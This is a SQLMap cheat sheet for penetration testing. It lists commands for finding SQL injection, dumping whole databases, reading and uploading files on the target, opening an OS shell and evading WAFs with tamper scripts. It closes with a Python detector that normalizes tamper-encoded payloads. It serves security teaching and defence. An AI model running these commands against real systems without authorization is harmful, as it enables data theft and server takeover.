SQLMap Cheat Sheet


What is SQLMap?

SQLMap is an open-source penetration testing tool that automates detecting and exploiting SQL injection flaws, up to and including taking over the underlying database server.


Basic SQLMap Commands

Command | Description
sqlmap -u <URL> | Scan the URL for SQL injection vulnerabilities
sqlmap -r <request_file> | Scan from a saved HTTP request file
sqlmap -u <URL> --dbs | List available databases on the target
sqlmap -u <URL> -D <db_name> --tables | List tables in a specific database
sqlmap -u <URL> -D <db_name> -T <table_name> --columns | List columns in a specific table
sqlmap -u <URL> -D <db_name> -T <table_name> -C <columns> --dump | Dump data from specific columns
sqlmap -u <URL> --dump-all | Dump the entire database
sqlmap -u <URL> --os-shell | Get a command shell on the operating system
sqlmap -u <URL> --dbms <DBMS> | Force SQLMap to use a specific database management system (e.g., MySQL, PostgreSQL)

Advanced Usage

1. Specifying Data Parameters

If the vulnerable parameter is not part of the URL query string, you can specify it manually.

Command | Description
sqlmap -u <URL> --data="param1=value1&param2=value2" | Inject SQL into POST request parameters
sqlmap -u <URL> --method PUT --data="param1=value1" | Use the HTTP PUT method with SQLMap

2. Cookie-based SQL Injection

If the vulnerability is in a cookie, you can pass the cookie values so SQLMap tests them.

Command | Description
sqlmap -u <URL> --cookie="PHPSESSID=abcd1234" | Send cookies with every request (for authenticated sessions) and test them for vulnerabilities

3. Scan with Specific User-Agent

Command | Description
sqlmap -u <URL> --user-agent="Mozilla/5.0" | Set a custom User-Agent header on the requests

4. Use a Proxy

Command | Description
sqlmap -u <URL> --proxy="http://localhost:8080" | Route SQLMap traffic through a proxy (e.g., Burp Suite)

Enumeration

1. Get Database Version

sqlmap -u <URL> --banner

2. List Databases

sqlmap -u <URL> --dbs

3. List Tables in a Specific Database

sqlmap -u <URL> -D <db_name> --tables

4. List Columns in a Specific Table

sqlmap -u <URL> -D <db_name> -T <table_name> --columns

5. Dump Table Data

sqlmap -u <URL> -D <db_name> -T <table_name> --dump

6. Dump Specific Columns

sqlmap -u <URL> -D <db_name> -T <table_name> -C <column1,column2> --dump

Exploitation Options

1. File System Access

Command | Description
sqlmap -u <URL> --file-read <file> | Read a file from the target's file system
sqlmap -u <URL> --file-write <local_file> --file-dest <remote_file> | Upload a file to the target

2. Command Shell

Command | Description
sqlmap -u <URL> --os-shell | Get an interactive operating system shell on the target

3. Out-of-Band Connections

Command | Description
sqlmap -u <URL> --dns-domain=<domain> | Perform out-of-band (OOB) interaction via DNS
sqlmap -u <URL> --dns-server=<server> | Specify a DNS server for OOB interactions

Other Useful Flags

Command | Description
sqlmap -u <URL> --batch | Automatically accept the default answer to every prompt (useful for automation)
sqlmap -u <URL> --tamper=<tamper_script> | Use tamper scripts to bypass WAF/IDS (e.g., --tamper=space2comment)
sqlmap -u <URL> --level=<level> | Set the level of tests (1 to 5; higher levels test more parameters)
sqlmap -u <URL> --risk=<risk> | Set the risk level of tests (1 to 3; higher risks may perform more intrusive operations)
sqlmap -u <URL> --random-agent | Use a randomly chosen User-Agent string

Example Commands

1. Basic SQL Injection Scan

sqlmap -u http://example.com/index.php?id=1

2. Dump Entire Database

sqlmap -u http://example.com/index.php?id=1 --dump-all

3. Dump Specific Database Table

sqlmap -u http://example.com/index.php?id=1 -D testdb -T users --dump

4. Bypass WAF Using Tamper Script

sqlmap -u http://example.com/index.php?id=1 --tamper=space2comment

Tamper Scripts

Tamper scripts can help you bypass Web Application Firewalls (WAFs) by rewriting the injected payload so that it no longer matches the WAF's signatures while remaining valid SQL. Some common tamper scripts:

Script | Description
space2comment.py | Replaces space characters with inline comments (/**/)
between.py | Replaces the comparison operators = and > with equivalent BETWEEN expressions
randomcase.py | Randomizes the case of SQL keywords

Usage Example:

sqlmap -u http://example.com/index.php?id=1 --tamper=space2comment
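The flip side of the three tamper scripts above is that a WAF rule or SIEM query matching on the raw parameter value is defeated by them. The following Python snippet is an added, defender-side example that is not part of the cheat sheet or of sqlmap: it normalizes a request parameter by undoing the space2comment, randomcase and between transformations before signature matching. The two signatures and the sample payloads are constructed for illustration, not a complete ruleset.

```python
import re
from typing import List

# Inline comments that space2comment.py inserts in place of spaces.
_INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# "X BETWEEN Y AND Y" is how between.py expresses "X = Y".
_BETWEEN_EQ = re.compile(r"(\S+)\s+between\s+(\S+)\s+and\s+\2\b")
# "X NOT BETWEEN 0 AND Y" is how between.py expresses "X > Y".
_BETWEEN_GT = re.compile(r"(\S+)\s+not\s+between\s+0\s+and\s+(\S+)")


def normalize_payload(raw: str) -> str:
    """Return a canonical, lowercase, comment-free form of a parameter value."""
    s = _INLINE_COMMENT.sub(" ", raw)      # undo space2comment
    s = s.lower()                          # undo randomcase
    s = re.sub(r"\s+", " ", s).strip()     # collapse runs of whitespace
    s = _BETWEEN_EQ.sub(r"\1=\2", s)       # undo between.py for "="
    s = _BETWEEN_GT.sub(r"\1>\2", s)       # undo between.py for ">"
    return s


# Illustrative signatures (constructed); evaluated on the normalized form only.
_SIGNATURES = {
    "union-select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "tautology": re.compile(r"\b(and|or)\b\s*(\S+)\s*=\s*\2\b"),  # e.g. "or 1=1"
}


def classify(raw: str) -> List[str]:
    """Names of the signatures that match after normalization (empty if none)."""
    norm = normalize_payload(raw)
    return [name for name, pat in _SIGNATURES.items() if pat.search(norm)]


if __name__ == "__main__":
    # Constructed sample values as they would appear in a web access log.
    samples = [
        "1/**/UNION/**/ALL/**/SELECT/**/1,2,3",   # space2comment
        "1 uNiOn sElEcT null",                    # randomcase
        "1 AND 1 BETWEEN 1 AND 1",                # between
        "42",                                     # benign
    ]
    for s in samples:
        print(f"{s!r:45} -> {normalize_payload(s)!r:30} {classify(s)}")
```

Matching on the raw value would miss the first three samples; matching on the normalized value flags all of them and leaves the benign one alone.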
